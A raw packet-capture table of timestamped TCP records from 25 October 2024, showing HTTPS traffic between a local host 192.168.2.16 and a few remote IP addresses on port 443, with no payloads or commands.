                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.496010065 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.496031046 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.496052027 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.496056080 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.496105909 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.496118069 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.496192932 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.496901989 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.496973038 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.612155914 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.612267971 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.612338066 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.612400055 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.612688065 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.612736940 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.613205910 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.613266945 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.613303900 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.613348007 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.655782938 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.655843973 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.729182005 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.729311943 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.729434967 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.729588985 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.730050087 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.730087996 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.730118990 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.730154991 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.730185986 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.730207920 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.730655909 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.730726004 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.846415997 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.846474886 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.846522093 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.846688986 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.846688986 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.846689939 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.846740007 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.846862078 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.846911907 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.846950054 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.846952915 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.846966982 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.846971989 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.847012043 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:38.847037077 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.260334969 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.260504961 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.260739088 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.260812044 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.260876894 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.260940075 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.260976076 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.261043072 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.261074066 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.261151075 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.261167049 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.261261940 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.261275053 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.261308908 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.261347055 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.261455059 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.261521101 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.261534929 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.261591911 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.261773109 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.261843920 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.261868000 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.261930943 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.261940956 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.261970997 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.262006998 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.262056112 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.262115955 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.262128115 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.262149096 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.262248039 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.262259960 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.262316942 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.269785881 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.269933939 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.269948959 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.270011902 CEST4434991834.49.241.189192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.270015001 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.270081043 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.270122051 CEST44349917104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.270184994 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.270200968 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.270241976 CEST49918443192.168.2.1634.49.241.189
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.270262957 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.270262957 CEST4434991834.49.241.189192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.270301104 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.270312071 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.270338058 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.270447969 CEST49917443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.270459890 CEST44349917104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.271078110 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.271145105 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.271157026 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.271213055 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.271477938 CEST4434991834.49.241.189192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.271541119 CEST49918443192.168.2.1634.49.241.189
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.271969080 CEST44349917104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.272036076 CEST49917443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.272512913 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.272525072 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.272558928 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.272592068 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.272613049 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.272635937 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.272821903 CEST49918443192.168.2.1634.49.241.189
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.272900105 CEST4434991834.49.241.189192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.273507118 CEST49918443192.168.2.1634.49.241.189
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.273521900 CEST4434991834.49.241.189192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.273561954 CEST49918443192.168.2.1634.49.241.189
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.273910046 CEST49917443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.274020910 CEST44349917104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.274163008 CEST49917443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.274180889 CEST44349917104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.289619923 CEST4434992063.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.289925098 CEST49920443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.289941072 CEST4434992063.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.290564060 CEST4434992063.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.290882111 CEST49920443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.291016102 CEST4434992063.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.291033983 CEST49920443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.291101933 CEST4434992063.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.315006971 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.315036058 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.315134048 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.315164089 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.315233946 CEST49918443192.168.2.1634.49.241.189
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.315248966 CEST4434991834.49.241.189192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.315267086 CEST49917443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.332416058 CEST49920443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.358623028 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.358647108 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.358732939 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.358807087 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.358840942 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.410259962 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.426506042 CEST44349917104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.426585913 CEST44349917104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.426628113 CEST44349917104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.426651955 CEST49917443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.426671028 CEST44349917104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.426690102 CEST44349917104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.426717997 CEST49917443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.426774979 CEST44349917104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.426817894 CEST44349917104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.426826954 CEST49917443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.426846027 CEST44349917104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.426914930 CEST49917443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.426929951 CEST44349917104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.427556992 CEST44349917104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.427609921 CEST49917443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.427624941 CEST44349917104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.432167053 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.432177067 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.432204008 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.432213068 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.432264090 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.432307959 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.432342052 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.432365894 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.435914040 CEST4434991834.49.241.189192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.436259985 CEST49918443192.168.2.1634.49.241.189
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.436331034 CEST4434991834.49.241.189192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.436400890 CEST49918443192.168.2.1634.49.241.189
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.473231077 CEST49917443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.475408077 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.475416899 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.475445986 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.475505114 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.475523949 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.475564957 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.475589991 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.536567926 CEST4434992063.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.536688089 CEST4434992063.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.536761999 CEST49920443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.538554907 CEST49920443192.168.2.1663.140.62.17
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.538562059 CEST4434992063.140.62.17192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.543508053 CEST44349917104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.543620110 CEST44349917104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.543668985 CEST44349917104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.543689966 CEST49917443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.543723106 CEST44349917104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.543795109 CEST49917443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.543817043 CEST44349917104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.543838978 CEST44349917104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.543915987 CEST49917443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.544152021 CEST49917443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.544167042 CEST44349917104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.549420118 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.549448013 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.549535990 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.549560070 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.549621105 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.555813074 CEST49922443192.168.2.16104.16.80.73
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.555850983 CEST44349922104.16.80.73192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.555963039 CEST49922443192.168.2.16104.16.80.73
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.556169987 CEST49922443192.168.2.16104.16.80.73
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.556181908 CEST44349922104.16.80.73192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.560709953 CEST49923443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.560725927 CEST44349923104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.560816050 CEST49923443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.561033010 CEST49923443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.561043978 CEST44349923104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.592539072 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.592561960 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.592694044 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.592757940 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.592829943 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.666879892 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.666898966 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.667206049 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.667270899 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.667366028 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.709678888 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.709706068 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.709790945 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.709853888 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.709933996 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.783648968 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.783679962 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.783818007 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.783881903 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.783957005 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.826404095 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.826450109 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.826504946 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.826554060 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.826581955 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.826603889 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.900214911 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.900249958 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.900495052 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.900559902 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.900640011 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.901554108 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.901571989 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.901774883 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.901839972 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.901921034 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.944370031 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.944392920 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.944490910 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.944571972 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.944644928 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.944750071 CEST44349913104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.944813967 CEST49913443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                                      Oct 25, 2024 00:07:39.944828987 CEST44349913104.18.66.57192.168.2.16
